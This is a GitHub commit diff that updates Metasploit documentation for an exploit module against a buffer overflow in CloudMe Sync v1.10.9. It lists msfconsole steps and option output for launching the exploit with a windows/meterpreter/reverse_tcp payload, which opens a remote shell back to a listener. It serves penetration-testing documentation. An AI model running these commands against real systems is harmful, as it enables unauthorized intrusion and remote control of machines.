Skip to content

Commit a23240a

Browse files
committed
Update Documentation
[ticket: rapid7#9594]
1 parent 6a62ca1 commit a23240a

File tree

1 file changed

+8
-33
lines changed

1 file changed

+8
-33
lines changed

documentation/modules/exploit/windows/misc/cloudme_sync.md

Lines changed: 8 additions & 33 deletions
Original file line numberDiff line numberDiff line change
@@ -1,47 +1,22 @@
1+
## Description
2+
This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe).
13

24
## Verification Steps
35
1. Install CloudMe for Desktop version `v1.10.9`
4-
2. Create a free account and start the applicaton
5-
6. Start `msfconsole`
6+
2. Start the applicaton (you don't need to create an account)
7+
3. Start `msfconsole`
68
4. Do `use exploit/windows/misc/cloudme_sync`
79
5. Do `set RHOST ip`
8-
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
9-
12. Do `set LHOST ip`
10-
13. Do `exploit`
11-
14. Verify the Meterpreter session is opened
10+
6. Do `set LHOST ip`
11+
7. Do `exploit`
12+
8. Verify the Meterpreter session is opened
1213

1314
## Scenarios
1415

15-
### CloudMe Sync client application on Windows 7 SP1
16+
### CloudMe Sync client application on Windows 7 SP1 x86
1617

1718
```
1819
msf > use exploit/windows/misc/cloudme_sync
19-
msf exploit(windows/misc/cloudme_sync) > show options
20-
21-
Module options (exploit/windows/misc/cloudme_sync):
22-
23-
Name Current Setting Required Description
24-
---- --------------- -------- -----------
25-
RHOST 172.16.40.148 yes The target address
26-
RPORT 8888 yes The target port (TCP)
27-
28-
29-
Payload options (windows/meterpreter/reverse_tcp):
30-
31-
Name Current Setting Required Description
32-
---- --------------- -------- -----------
33-
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
34-
LHOST 172.16.40.5 yes The listen address
35-
LPORT 4444 yes The listen port
36-
37-
38-
Exploit target:
39-
40-
Id Name
41-
-- ----
42-
0 CloudMe Sync v1.10.9
43-
44-
4520
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
4621
RHOST => 172.16.40.148
4722
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp

0 commit comments

Comments
 (0)